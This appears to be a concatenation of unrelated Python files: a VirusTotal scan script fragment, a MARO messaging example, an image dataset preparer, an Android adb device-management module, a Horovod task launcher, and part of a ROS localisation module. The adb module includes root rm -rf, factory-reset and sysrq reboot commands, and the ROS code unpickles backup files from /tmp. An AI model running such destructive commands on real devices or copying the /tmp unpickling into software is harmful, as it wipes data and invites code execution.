logging.debug(f'{info.keys()}')
if(info['data']['attributes']['status']=='completed'):
_result=True
time.sleep(0.1)
_info=info['data']['attributes']['stats']
_showInfo()
def _showInfo():
global _info
print(_info)
upid=uploadAndStartScan(_vsTotUploader,_FILE)
print(waitTillCompleted( _API_KEY,upid)) |
broadcast.py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import multiprocessing as mp
from maro.communication import Proxy, SessionType
def worker(group_name):
"""
The main worker logic includes initialize proxy and handle jobs from the master.
Args:
group_name (str): Identifier for the group of all communication components.
"""
proxy = Proxy(group_name=group_name,
component_type="worker",
expected_peers={"master": 1})
counter = 0
print(f"{proxy.component_name}'s counter is {counter}.")
# nonrecurring receive the message from the proxy.
for msg in proxy.receive(is_continuous=False):
print(f"{proxy.component_name} receive message from {msg.source}.")
if msg.tag == "INC":
counter += 1
print(f"{proxy.component_name} receive INC request, {proxy.component_name}'s count is {counter}.")
proxy.reply(received_message=msg, tag="done")
def master(group_name: str, worker_num: int, is_immediate: bool = False):
"""
The main master logic includes initialize proxy and allocate jobs to workers.
Args:
group_name (str): Identifier for the group of all communication components,
worker_num (int): The number of workers,
is_immediate (bool): If True, it will be an async mode; otherwise, it will be an sync mode.
Async Mode: The proxy only returns the session id for sending messages. Based on the local task priority,
you can do something with high priority before receiving replied messages from peers.
Sync Mode: It will block until the proxy returns all the replied messages.
"""
proxy = Proxy(group_name=group_name,
component_type="master",
expected_peers={"worker": worker_num})
if is_immediate:
session_ids = proxy.ibroadcast(tag="INC",
session_type=SessionType.NOTIFICATION)
# do some tasks with higher priority here.
replied_msgs = proxy.receive_by_id(session_ids)
else:
replied_msgs = proxy.broadcast(tag="INC",
session_type=SessionType.NOTIFICATION)
for msg in replied_msgs:
print(f"{proxy.component_name} get receive notification from {msg.source} with message session stage " +
f"{msg.session_stage}.")
if __name__ == "__main__":
"""
This is a single-host multiprocess program used to simulate the communication in the distributed system.
For the completed usage experience of the distributed cluster, please use the MARO CLI.
"""
mp.set_start_method("spawn")
group_name = "proxy_broadcast_INC_example"
worker_number = 5
is_immediate = True
workers = mp.Pool(worker_number)
master_process = mp.Process(target=master, args=(group_name, worker_number, is_immediate,))
master_process.start()
workers.map(worker, [group_name] * worker_number)
workers.close()
master_process.join()
workers.join()
|
prepare_data.py | import argparse
from io import BytesIO
import multiprocessing
from multiprocessing import Lock, Process, RawValue
from functools import partial
from multiprocessing.sharedctypes import RawValue
from PIL import Image
from tqdm import tqdm
from torchvision.transforms import functional as trans_fn
import os
from pathlib import Path
import lmdb
import numpy as np
import time
def resize_and_convert(img, size, resample):
if(img.size[0] != size):
img = trans_fn.resize(img, size, resample)
img = trans_fn.center_crop(img, size)
return img
def image_convert_bytes(img):
buffer = BytesIO()
img.save(buffer, format='png')
return buffer.getvalue()
def resize_multiple(img, sizes=(16, 128), resample=Image.BICUBIC, lmdb_save=False):
lr_img = resize_and_convert(img, sizes[0], resample)
hr_img = resize_and_convert(img, sizes[1], resample)
sr_img = resize_and_convert(lr_img, sizes[1], resample)
if lmdb_save:
lr_img = image_convert_bytes(lr_img)
hr_img = image_convert_bytes(hr_img)
sr_img = image_convert_bytes(sr_img)
return [lr_img, hr_img, sr_img]
def resize_worker(img_file, sizes, resample, lmdb_save=False):
img = Image.open(img_file)
img = img.convert('RGB')
out = resize_multiple(
img, sizes=sizes, resample=resample, lmdb_save=lmdb_save)
return img_file.name.split('.')[0], out
class WorkingContext():
def __init__(self, resize_fn, lmdb_save, out_path, env, sizes):
self.resize_fn = resize_fn
self.lmdb_save = lmdb_save
self.out_path = out_path
self.env = env
self.sizes = sizes
self.counter = RawValue('i', 0)
self.counter_lock = Lock()
def inc_get(self):
with self.counter_lock:
self.counter.value += 1
return self.counter.value
def value(self):
with self.counter_lock:
return self.counter.value
def prepare_process_worker(wctx, file_subset):
for file in file_subset:
i, imgs = wctx.resize_fn(file)
lr_img, hr_img, sr_img = imgs
if not wctx.lmdb_save:
lr_img.save(
'{}/lr_{}/{}.png'.format(wctx.out_path, wctx.sizes[0], i.zfill(5)))
hr_img.save(
'{}/hr_{}/{}.png'.format(wctx.out_path, wctx.sizes[1], i.zfill(5)))
sr_img.save(
'{}/sr_{}_{}/{}.png'.format(wctx.out_path, wctx.sizes[0], wctx.sizes[1], i.zfill(5)))
else:
with wctx.env.begin(write=True) as txn:
txn.put('lr_{}_{}'.format(
wctx.sizes[0], i.zfill(5)).encode('utf-8'), lr_img)
txn.put('hr_{}_{}'.format(
wctx.sizes[1], i.zfill(5)).encode('utf-8'), hr_img)
txn.put('sr_{}_{}_{}'.format(
wctx.sizes[0], wctx.sizes[1], i.zfill(5)).encode('utf-8'), sr_img)
curr_total = wctx.inc_get()
if wctx.lmdb_save:
with wctx.env.begin(write=True) as txn:
txn.put('length'.encode('utf-8'), str(curr_total).encode('utf-8'))
def all_threads_inactive(worker_threads):
for thread in worker_threads:
if thread.is_alive():
return False
return True
def prepare(img_path, out_path, n_worker, sizes=(16, 128), resample=Image.BICUBIC, lmdb_save=False):
resize_fn = partial(resize_worker, sizes=sizes,
resample=resample, lmdb_save=lmdb_save)
files = [p for p in Path(
'{}'.format(img_path)).glob(f'**/*')]
if not lmdb_save:
os.makedirs(out_path, exist_ok=True)
os.makedirs('{}/lr_{}'.format(out_path, sizes[0]), exist_ok=True)
os.makedirs('{}/hr_{}'.format(out_path, sizes[1]), exist_ok=True)
os.makedirs('{}/sr_{}_{}'.format(out_path,
sizes[0], sizes[1]), exist_ok=True)
else:
env = lmdb.open(out_path, map_size=1024 ** 4, readahead=False)
if n_worker > 1:
# prepare data subsets
multi_env = None
if lmdb_save:
multi_env = env
file_subsets = np.array_split(files, n_worker)
worker_threads = []
wctx = WorkingContext(resize_fn, lmdb_save, out_path, multi_env, sizes)
# start worker processes, monitor results
for i in range(n_worker):
proc = Process(target=prepare_process_worker, args=(wctx, file_subsets[i]))
proc.start()
worker_threads.append(proc)
total_count = str(len(files))
while not all_threads_inactive(worker_threads):
print("{}/{} images processed".format(wctx.value(), total_count))
time.sleep(0.1)
else:
total = 0
for file in tqdm(files):
i, imgs = resize_fn(file)
lr_img, hr_img, sr_img = imgs
if not lmdb_save:
lr_img.save(
'{}/lr_{}/{}.png'.format(out_path, sizes[0], i.zfill(5)))
hr_img.save(
'{}/hr_{}/{}.png'.format(out_path, sizes[1], i.zfill(5)))
sr_img.save(
'{}/sr_{}_{}/{}.png'.format(out_path, sizes[0], sizes[1], i.zfill(5)))
else:
with env.begin(write=True) as txn:
txn.put('lr_{}_{}'.format(
sizes[0], i.zfill(5)).encode('utf-8'), lr_img)
txn.put('hr_{}_{}'.format(
sizes[1], i.zfill(5)).encode('utf-8'), hr_img)
txn.put('sr_{}_{}_{}'.format(
sizes[0], sizes[1], i.zfill(5)).encode('utf-8'), sr_img)
total += 1
if lmdb_save:
with env.begin(write=True) as txn:
txn.put('length'.encode('utf-8'), str(total).encode('utf-8'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--path', '-p', type=str,
default='{}/Dataset/celebahq_256'.format(Path.home()))
parser.add_argument('--out', '-o', type=str,
default='./dataset/celebahq')
parser.add_argument('--size', type=str, default='64,512')
parser.add_argument('--n_worker', type=int, default=3)
parser.add_argument('--resample', type=str, default='bicubic')
# default save in png format
parser.add_argument('--lmdb', '-l', action='store_true')
args = parser.parse_args()
resample_map = {'bilinear': Image.BILINEAR, 'bicubic': Image.BICUBIC}
resample = resample_map[args.resample]
sizes = [int(s.strip()) for s in args.size.split(',')]
args.out = '{}_{}_{}'.format(args.out, sizes[0], sizes[1])
prepare(args.path, args.out, args.n_worker,
sizes=sizes, resample=resample, lmdb_save=args.lmdb)
|
adb.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ADB shell related functions."""
from builtins import str
from future import standard_library
standard_library.install_aliases()
import collections
import glob
import os
import re
import signal
import subprocess
import tempfile
import threading
import time
from base import persistent_cache
from base import utils
from metrics import logs
from system import environment
from system import shell
ADB_TIMEOUT = 1200 # Should be lower than |REBOOT_TIMEOUT|.
BAD_STATE_WAIT = 900
BOOT_WAIT_INTERVAL = 30
DEFAULT_DEVICE_MEMORY_MB = 2048
DEVICE = collections.namedtuple('Device', ['serial', 'path'])
DEVICE_HANG_STRING = None
DEVICE_NOT_FOUND_STRING = 'error: device \'{serial}\' not found'
DEVICE_OFFLINE_STRING = 'error: device offline'
FACTORY_RESET_WAIT = 60
KERNEL_LOG_FILES = [
'/proc/last_kmsg',
'/sys/fs/pstore/console-ramoops',
]
MONKEY_PROCESS_NAME = 'monkey'
REBOOT_TIMEOUT = 3600
RECOVERY_CMD_TIMEOUT = 60
STOP_CVD_WAIT = 20
# Output patterns to parse "lsusb" output.
LSUSB_BUS_RE = re.compile(r'Bus\s+(\d+)\s+Device\s+(\d+):.*')
LSUSB_SERIAL_RE = re.compile(r'\s+iSerial\s+\d\s+(.*)')
# This is a constant value defined in usbdevice_fs.h in Linux system.
USBDEVFS_RESET = ord('U') << 8 | 20
def bad_state_reached():
"""Wait when device is in a bad state and exit."""
persistent_cache.clear_values()
logs.log_fatal_and_exit(
'Device in bad state.', wait_before_exit=BAD_STATE_WAIT)
def copy_local_directory_to_remote(local_directory, remote_directory):
"""Copies local directory contents to a device directory."""
create_directory_if_needed(remote_directory)
if os.listdir(local_directory):
run_command(['push', '%s/.' % local_directory, remote_directory])
def copy_local_file_to_remote(local_file_path, remote_file_path):
"""Copies local file to a device file."""
create_directory_if_needed(os.path.dirname(remote_file_path))
run_command(['push', local_file_path, remote_file_path])
def copy_remote_directory_to_local(remote_directory, local_directory):
"""Copies local directory contents to a device directory."""
run_command(['pull', '%s/.' % remote_directory, local_directory])
def copy_remote_file_to_local(remote_file_path, local_file_path):
"""Copies device file to a local file."""
shell.create_directory(
os.path.dirname(local_file_path), create_intermediates=True)
run_command(['pull', remote_file_path, local_file_path])
def create_directory_if_needed(device_directory):
"""Creates a directory on the device if it doesn't already exist."""
run_shell_command(['mkdir', '-p', device_directory])
def directory_exists(directory_path):
"""Return whether a directory exists or not."""
expected = '0'
result = run_shell_command(
'\'test -d "%s"; echo $?\'' % directory_path, log_error=False)
return result == expected
def execute_command(cmd, timeout=None, log_error=True):
"""Spawns a subprocess to run the given shell command."""
so = []
output_dest = tempfile.TemporaryFile()
# pylint: disable=subprocess-popen-preexec-fn
pipe = subprocess.Popen(
cmd,
executable='/bin/bash',
stdout=output_dest,
stderr=subprocess.STDOUT,
shell=True,
preexec_fn=lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL),
bufsize=0)
def run():
"""Thread target function that waits for subprocess to complete."""
try:
pipe.communicate()
output_dest.seek(0)
output = output_dest.read()
output_dest.close()
if output:
so.append(output)
except OSError as _:
logs.log_warn('Failed to retrieve stdout from: %s' % cmd)
if pipe.returncode:
if log_error:
logs.log_warn(
'%s returned %d error code.' % (cmd, pipe.returncode),
output=output)
thread = threading.Thread(target=run)
thread.start()
thread.join(timeout)
if thread.isAlive():
try:
pipe.kill()
except OSError:
# Can't kill a dead process.
pass
return None
bytes_output = b''.join(so)
return bytes_output.strip().decode('utf-8', errors='ignore')
def factory_reset():
"""Reset device to factory state."""
if is_gce():
# We cannot recover from this since there can be cases like userdata image
# corruption in /data/data. Till the bug is fixed, we just need to wait
# for reimage in next iteration.
bad_state_reached()
# A device can be stuck in a boot loop due to a bad clang library update.
# Reverting that can bring a device back to good state.
revert_asan_device_setup_if_needed()
run_as_root()
run_shell_command([
'am', 'broadcast', '-a', 'android.intent.action.MASTER_CLEAR', '-n',
'android/com.android.server.MasterClearReceiver'
])
# Wait until the reset is complete.
time.sleep(FACTORY_RESET_WAIT)
def file_exists(file_path):
"""Return whether a file exists or not."""
expected = '0'
result = run_shell_command(
'\'test -f "%s"; echo $?\'' % file_path, log_error=False)
return result == expected
def get_adb_command_line(adb_cmd):
"""Return adb command line for running an adb command."""
device_serial = environment.get_value('ANDROID_SERIAL')
adb_cmd_line = '%s -s %s %s' % (get_adb_path(), device_serial, adb_cmd)
return adb_cmd_line
def get_adb_path():
"""Return path to ADB binary."""
adb_path = environment.get_value('ADB')
if adb_path:
return adb_path
return os.path.join(environment.get_platform_resources_directory(), 'adb')
def get_device_state():
"""Return the device status."""
state_cmd = get_adb_command_line('get-state')
return execute_command(state_cmd, timeout=RECOVERY_CMD_TIMEOUT)
def get_fastboot_command_line(fastboot_cmd):
"""Return fastboot command line for running a fastboot command."""
fastboot_cmd_line = '%s %s' % (get_fastboot_path(), fastboot_cmd)
return fastboot_cmd_line
def get_fastboot_path():
"""Return path to fastboot binary."""
return os.path.join(environment.get_platform_resources_directory(),
'fastboot')
def get_file_checksum(file_path):
"""Return file's md5 checksum."""
if not file_exists(file_path):
return None
return run_shell_command(['md5sum', '-b', file_path])
def get_file_size(file_path):
"""Return file's size."""
if not file_exists(file_path):
return None
return int(run_shell_command(['stat', '-c%s', file_path]))
def get_kernel_log_content():
"""Return content of kernel logs."""
kernel_log_content = ''
for kernel_log_file in KERNEL_LOG_FILES:
kernel_log_content += read_data_from_file(kernel_log_file) or ''
return kernel_log_content
def get_ps_output():
"""Return ps output for all processes."""
return run_shell_command(['ps', '-A'])
def get_process_and_child_pids(process_name):
"""Return process and child pids matching a process name."""
pids = []
ps_output_lines = get_ps_output().splitlines()
while True:
old_pids_length = len(pids)
for line in ps_output_lines:
data = line.split()
# Make sure we have a valid pid and parent pid.
try:
# PID is in the second column.
line_process_pid = int(data[1])
# Parent PID is in the third column.
line_parent_pid = int(data[2])
except:
continue
# If we have already processed this pid, no more work to do.
if line_process_pid in pids:
continue
# Process name is in the last column.
# Monkey framework instances (if any) are children of our process launch,
# so include these in pid list.
line_process_name = data[-1]
if (process_name in line_process_name or
MONKEY_PROCESS_NAME in line_process_name):
if process_name == line_process_name:
pids.insert(0, line_process_pid)
else:
pids.append(line_process_pid)
continue
# Add child pids to end.
if line_parent_pid in pids:
pids.append(line_process_pid)
new_pids_length = len(pids)
if old_pids_length == new_pids_length:
break
return pids
def get_property(property_name):
"""Return property's value."""
return run_shell_command(['getprop', property_name])
def hard_reset():
"""Perform a hard reset of the device."""
if is_gce():
# There is no recovery step at this point for a gce bot, so just exit
# and wait for reimage on next iteration.
bad_state_reached()
# For physical device.
# Try hard-reset via sysrq-trigger (requires root).
hard_reset_sysrq_cmd = get_adb_command_line(
'shell echo b \\> /proc/sysrq-trigger')
execute_command(hard_reset_sysrq_cmd, timeout=RECOVERY_CMD_TIMEOUT)
# Try soft-reset now (does not require root).
soft_reset_cmd = get_adb_command_line('reboot')
execute_command(soft_reset_cmd, timeout=RECOVERY_CMD_TIMEOUT)
def is_gce():
"""Returns if we are running in GCE environment."""
android_serial = environment.get_value('ANDROID_SERIAL')
return android_serial.startswith('127.0.0.1:')
def kill_processes_and_children_matching_name(process_name):
"""Kills process along with children matching names."""
process_and_child_pids = get_process_and_child_pids(process_name)
if not process_and_child_pids:
return
kill_command = ['kill', '-9'] + process_and_child_pids
run_shell_command(kill_command)
def read_data_from_file(file_path):
"""Return device's file content."""
if not file_exists(file_path):
return None
return run_shell_command(['cat', '"%s"' % file_path])
def reboot():
"""Reboots device."""
run_command('reboot')
def start_gce_device():
"""Start the gce device."""
cvd_dir = environment.get_value('CVD_DIR')
cvd_bin_dir = os.path.join(cvd_dir, 'bin')
launch_cvd_path = os.path.join(cvd_bin_dir, 'launch_cvd')
device_memory_mb = environment.get_value('DEVICE_MEMORY_MB',
DEFAULT_DEVICE_MEMORY_MB)
launch_cvd_command_line = (
'{launch_cvd_path} -daemon -memory_mb {device_memory_mb}'.format(
launch_cvd_path=launch_cvd_path, device_memory_mb=device_memory_mb))
execute_command(launch_cvd_command_line)
def stop_gce_device():
"""Stops the gce device."""
cvd_dir = environment.get_value('CVD_DIR')
cvd_bin_dir = os.path.join(cvd_dir, 'bin')
stop_cvd_path = os.path.join(cvd_bin_dir, 'stop_cvd')
execute_command(stop_cvd_path, timeout=RECOVERY_CMD_TIMEOUT)
time.sleep(STOP_CVD_WAIT)
def recreate_gce_device():
"""Recreate gce device, restoring from backup images."""
logs.log('Reimaging gce device.')
cvd_dir = environment.get_value('CVD_DIR')
stop_gce_device()
# Delete all existing images.
image_dir = cvd_dir
for image_file_path in glob.glob(os.path.join(image_dir, '*.img')):
shell.remove_file(image_file_path)
# Restore images from backup.
backup_image_dir = os.path.join(cvd_dir, 'backup')
for image_filename in os.listdir(backup_image_dir):
image_src = os.path.join(backup_image_dir, image_filename)
image_dest = os.path.join(image_dir, image_filename)
shell.copy_file(image_src, image_dest)
start_gce_device()
def remount():
"""Remount /system as read/write."""
run_as_root()
run_command('remount')
wait_for_device()
run_as_root()
def remove_directory(device_directory, recreate=False):
"""Delete everything inside of a device directory and recreate if needed."""
run_shell_command('rm -rf %s' % device_directory, root=True)
if recreate:
create_directory_if_needed(device_directory)
def remove_file(file_path):
"""Remove file."""
run_shell_command('rm -f %s' % file_path, root=True)
def reset_device_connection():
"""Reset the connection to the physical device through USB. Returns whether
or not the reset succeeded."""
if is_gce():
stop_gce_device()
start_gce_device()
else:
# Physical device. Try restarting usb.
reset_usb()
# Check device status.
state = get_device_state()
if state != 'device':
logs.log_warn('Device state is %s, unable to recover using usb reset/'
'gce reconnect.' % str(state))
return False
return True
def get_device_path():
"""Gets a device path to be cached and used by reset_usb."""
def _get_usb_devices():
"""Returns a list of device objects containing a serial and USB path."""
usb_list_cmd = 'lsusb -v'
output = execute_command(usb_list_cmd, timeout=RECOVERY_CMD_TIMEOUT)
if output is None:
logs.log_error('Failed to populate usb devices using lsusb, '
'host restart might be needed.')
bad_state_reached()
devices = []
path = None
for line in output.splitlines():
match = LSUSB_BUS_RE.match(line)
if match:
path = '/dev/bus/usb/%s/%s' % (match.group(1), match.group(2))
continue
match = LSUSB_SERIAL_RE.match(line)
if path and match and match.group(1):
serial = match.group(1)
devices.append(DEVICE(serial, path))
return devices
def _get_device_path_for_serial():
"""Return device path. Assumes a simple ANDROID_SERIAL."""
devices = _get_usb_devices()
for device in devices:
if device_serial == device.serial:
return device.path
return None
def _get_device_path_for_usb():
"""Returns a device path.
Assumes ANDROID_SERIAL in the form "usb:<identifier>"."""
# Android serial may reference a usb device rather than a serial number.
device_id = device_serial[len('usb:'):]
bus_number = int(
open('/sys/bus/usb/devices/%s/busnum' % device_id).read().strip())
device_number = int(
open('/sys/bus/usb/devices/%s/devnum' % device_id).read().strip())
return '/dev/bus/usb/%03d/%03d' % (bus_number, device_number)
if is_gce():
return None
device_serial = environment.get_value('ANDROID_SERIAL')
if device_serial.startswith('usb:'):
return _get_device_path_for_usb()
return _get_device_path_for_serial()
def reset_usb():
"""Reset USB bus for a device serial."""
if is_gce():
# Nothing to do here.
return True
# App Engine does not let us import this.
import fcntl
# We need to get latest device path since it could be changed in reboots or
# adb root restarts.
try:
device_path = get_device_path()
except IOError:
# We may reach this state if the device is no longer available.
device_path = None
if not device_path:
# Try pulling from cache (if available).
device_path = environment.get_value('DEVICE_PATH')
if not device_path:
logs.log_warn('No device path found, unable to reset usb.')
return False
try:
with open(device_path, 'w') as f:
fcntl.ioctl(f, USBDEVFS_RESET)
except:
logs.log_warn('Failed to reset usb.')
return False
# Wait for usb to recover.
wait_for_device()
return True
def revert_asan_device_setup_if_needed():
"""Reverts ASan device setup if installed."""
if not environment.get_value('ASAN_DEVICE_SETUP'):
return
device_id = environment.get_value('ANDROID_SERIAL')
device_argument = '--device %s' % device_id
revert_argument = '--revert'
asan_device_setup_script_path = os.path.join(
environment.get_platform_resources_directory(), 'third_party',
'asan_device_setup.sh')
command = '%s %s %s' % (asan_device_setup_script_path, device_argument,
revert_argument)
execute_command(command, timeout=RECOVERY_CMD_TIMEOUT)
def run_as_root():
"""Restart adbd and runs as root."""
# Check if we are already running as root. If yes bail out.
if get_property('service.adb.root') == '1':
return
wait_for_device()
run_command('root')
wait_for_device()
def run_command(cmd,
log_output=False,
log_error=True,
timeout=None,
recover=True):
"""Run a command in adb shell."""
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if log_output:
logs.log('Running: adb %s' % cmd)
if not timeout:
timeout = ADB_TIMEOUT
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
if not recover:
if log_output:
logs.log('Output: (%s)' % output)
return output
device_not_found_string_with_serial = DEVICE_NOT_FOUND_STRING.format(
serial=environment.get_value('ANDROID_SERIAL'))
if (output in [
DEVICE_HANG_STRING, DEVICE_OFFLINE_STRING,
device_not_found_string_with_serial
]):
logs.log_warn('Unable to query device, resetting device connection.')
if reset_device_connection():
# Device has successfully recovered, re-run command to get output.
# Continue execution and validate output next for |None| condition.
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
else:
output = DEVICE_HANG_STRING
if output is DEVICE_HANG_STRING:
# Handle the case where our command execution hung. This is usually when
# device goes into a bad state and only way to recover is to restart it.
logs.log_warn('Unable to query device, restarting device to recover.')
hard_reset()
# Wait until we've booted and try the command again.
wait_until_fully_booted()
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
if log_output:
logs.log('Output: (%s)' % output)
return output
def run_shell_command(cmd,
log_output=False,
log_error=True,
root=False,
timeout=None,
recover=True):
"""Run adb shell command (with root if needed)."""
def _escape_specials(command):
return command.replace('\\', '\\\\').replace('"', '\\"')
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if cmd[0] not in ['"', "'"]:
cmd = '"{}"'.format(_escape_specials(cmd))
if root:
root_cmd_prefix = 'su root sh -c '
# The arguments to adb shell need to be quoted, so if we're using
# su root sh -c, quote the combined command
full_cmd = 'shell \'{}{}\''.format(root_cmd_prefix, cmd)
else:
full_cmd = 'shell {}'.format(cmd)
return run_command(
full_cmd,
log_output=log_output,
log_error=log_error,
timeout=timeout,
recover=recover)
def run_fastboot_command(cmd, log_output=True, log_error=True, timeout=None):
"""Run a command in fastboot shell."""
if is_gce():
# We can't run fastboot commands on Android GCE instances.
return None
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if log_output:
logs.log('Running: fastboot %s' % cmd)
if not timeout:
timeout = ADB_TIMEOUT
output = execute_command(get_fastboot_command_line(cmd), timeout, log_error)
return output
def setup_adb():
"""Sets up ADB binary for use."""
adb_binary_path = get_adb_path()
# Make sure that ADB env var is set.
if not environment.get_value('ADB'):
environment.set_value('ADB', adb_binary_path)
def start_shell():
"""Stops shell."""
# Make sure we are running as root.
run_as_root()
run_shell_command('start')
wait_until_fully_booted()
def stop_shell():
"""Stops shell."""
# Make sure we are running as root.
run_as_root()
run_shell_command('stop')
def time_since_last_reboot():
"""Return time in seconds since last reboot."""
uptime_string = run_shell_command(['cat', '/proc/uptime']).split(' ')[0]
try:
return float(uptime_string)
except ValueError:
# Sometimes, adb can just hang or return null output. In these cases, just
# return infinity uptime value.
return float('inf')
def wait_for_device():
"""Waits indefinitely for the device to come online."""
run_command('wait-for-device', timeout=RECOVERY_CMD_TIMEOUT)
def wait_until_fully_booted():
"""Wait until device is fully booted or timeout expires."""
def boot_completed():
expected = '1'
result = run_shell_command('getprop sys.boot_completed', log_error=False)
return result == expected
def drive_ready():
expected = '0'
result = run_shell_command('\'test -d "/"; echo $?\'', log_error=False)
return result == expected
def package_manager_ready():
expected = 'package:/system/framework/framework-res.apk'
result = run_shell_command('pm path android', log_error=False)
if not result:
return False
# Ignore any extra messages before or after the result we want.
return expected in result.splitlines()
# Make sure we are not already recursing inside this function.
if utils.is_recursive_call():
return False
# Wait until device is online.
wait_for_device()
start_time = time.time()
is_boot_completed = False
is_drive_ready = False
is_package_manager_ready = False
while time.time() - start_time < REBOOT_TIMEOUT:
# TODO(mbarbella): Investigate potential optimizations.
# The package manager check should also work for shell restarts.
if not is_drive_ready:
is_drive_ready = drive_ready()
if not is_package_manager_ready:
is_package_manager_ready = package_manager_ready()
if not is_boot_completed:
is_boot_completed = boot_completed()
if is_drive_ready and is_package_manager_ready and is_boot_completed:
return True
time.sleep(BOOT_WAIT_INTERVAL)
factory_reset()
logs.log_fatal_and_exit(
'Device failed to finish boot. Reset to factory settings and exited.')
# Not reached.
return False
def write_command_line_file(command_line, app_path):
"""Write command line file with command line argument for the application."""
command_line_path = environment.get_value('COMMAND_LINE_PATH')
if not command_line_path:
return
# Algorithm for filtering current command line.
# 1. Remove |APP_PATH| from front.
# 2. Add 'chrome ' to start.
# 3. Strip for whitespaces at start and end.
command_line_without_app_path = command_line.replace('%s ' % app_path, '')
command_line_file_contents = 'chrome %s' % (
command_line_without_app_path.strip())
write_data_to_file(command_line_file_contents, command_line_path)
def write_data_to_file(contents, file_path):
"""Writes content to file."""
# If this is a file in /system, we need to remount /system as read-write and
# after file is written, revert it back to read-only.
is_system_file = file_path.startswith('/system')
if is_system_file:
remount()
# Write file with desired contents.
run_shell_command("\"echo -n '%s' | su root dd of=%s\"" % (contents.replace(
'"', '\\"'), file_path))
# Make command line file is readable.
run_shell_command('chmod 0644 %s' % file_path, root=True)
if is_system_file:
reboot()
wait_until_fully_booted()
|
__init__.py | # Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import threading
import time
from horovod.spark.task import task_info, task_service
from horovod.spark.task.task_info import get_available_devices
from horovod.spark.driver import driver_service
from horovod.run.common.util import codec, secret
def _parent_process_monitor(initial_ppid):
try:
while True:
if initial_ppid != os.getppid():
# Parent process died, terminate
os._exit(1)
time.sleep(1)
except:
# Avoids an error message during Python interpreter shutdown.
pass
def task_exec(driver_addresses, settings, rank_env):
# Die if parent process terminates
bg = threading.Thread(target=_parent_process_monitor, args=(os.getppid(),))
bg.daemon = True
bg.start()
key = codec.loads_base64(os.environ[secret.HOROVOD_SECRET_KEY])
rank = int(os.environ[rank_env])
driver_client = driver_service.SparkDriverClient(driver_addresses, key,
verbose=settings.verbose)
task_index = driver_client.task_index_by_rank(rank)
task_addresses = driver_client.all_task_addresses(task_index)
task_client = task_service.SparkTaskClient(task_index, task_addresses, key,
verbose=settings.verbose)
task_info.set_resources(task_client.resources())
fn, args, kwargs = driver_client.code()
result = fn(*args, **kwargs)
task_client.register_code_result(result)
|
lrs.py | import rospy
import pickle
import os
import time
import math
import yaml
import sympy as sp
import numpy as np
from scipy.optimize import minimize
from threading import Thread
from ar_track_alvar_msgs.msg import AlvarMarkers
from nav_msgs.msg import Odometry
from geometry_msgs.msg import PoseWithCovarianceStamped
class Marker:
LIMIT = 50
def __init__(self, m_id=None, known_location=(None, None)):
self.id = m_id
self.logged = False
self.visible_flag = False
self.known_x, self.known_y = known_location
self.observed_positions = []
self.distance_to_robot = 999
def update_distance(self, pose):
_, x, y = self.loc()
self.distance_to_robot = math.sqrt((y - pose[1]) ** 2 + (x - pose[0]) ** 2)
def observed(self, x, y):
"""
Append to observed locations
"""
if len(self.observed_positions) == self.LIMIT:
self.observed_positions.pop(0)
self.observed_positions.append([x, y])
def kloc(self, convert=False):
"""
Return known location
"""
if convert:
return np.array([self.known_x, self.known_y, 1])
return self.known_x, self.known_y
def loc(self, convert=False):
"""
Return observed location
"""
if len(self.observed_positions) == 0:
return (0, None, None)
med = np.median(self.observed_positions, axis=0)
if convert:
return np.array([med[0], med[1], 1])
return self.accuracy(), med[0], med[1]
def visible(self, flag):
self.visible_flag = flag if self.id != -1 else True
def accuracy(self):
if self.id == -1:
return 1.0
return len(self.observed_positions) / self.LIMIT
class LRS:
LIMIT = 20
def __init__(self, driver, clean=False):
self.config = yaml.load(open("./config/config.yaml"), Loader=yaml.FullLoader)
self.driver_instance = driver
self.visible_landmarks = 0
self.pose = None
self.recovered = False
self.dictionary = dict()
self.M_TRANS = None
if (
os.path.exists("/tmp/LRS_matrix.bak")
and os.path.exists("/tmp/LRS_landmarks.bak")
and not clean
):
self.recovered = True
bakfile = open("/tmp/LRS_matrix.bak", "rb")
self.M_TRANS = pickle.load(bakfile)
self.update_MT()
bakfile.close()
bakfile = open("/tmp/LRS_landmarks.bak", "rb")
self.dictionary = pickle.load(bakfile)
bakfile.close()
else:
self.dictionary[-1] = Marker(
-1,
(
self.config["initial_position"]["x"],
self.config["initial_position"]["y"],
),
)
landmarks = yaml.load(
open("./config/landmarks.yaml"), Loader=yaml.FullLoader
)
for val in landmarks["landmarks"]:
m_id, x, y = val.values()
self.dictionary[m_id] = Marker(m_id, (x, y))
self.worker = Thread(name="LRS_worker", target=self.daemon_worker)
self.worker.setDaemon(True)
self.worker.start()
self.crs_worker = Thread(name="LRS_CRS", target=self.daemon_crs_worker)
self.crs_worker.setDaemon(True)
self.crs_worker.start()
def daemon_crs_worker(self):
rospy.loginfo("LRS Crash Recovery System is starting")
try:
while not rospy.core.is_shutdown():
try:
bakfile = open("/tmp/LRS_matrix.bak", "wb")
pickle.dump(self.M_TRANS, bakfile)
bakfile.close()
bakfile = open("/tmp/LRS_landmarks.bak", "wb")
pickle.dump(self.dictionary, bakfile)
bakfile.close()
rospy.rostime.wallsleep(1.0)
except Exception as why:
rospy.logerr("Error in LRS CRS... Recovering...")
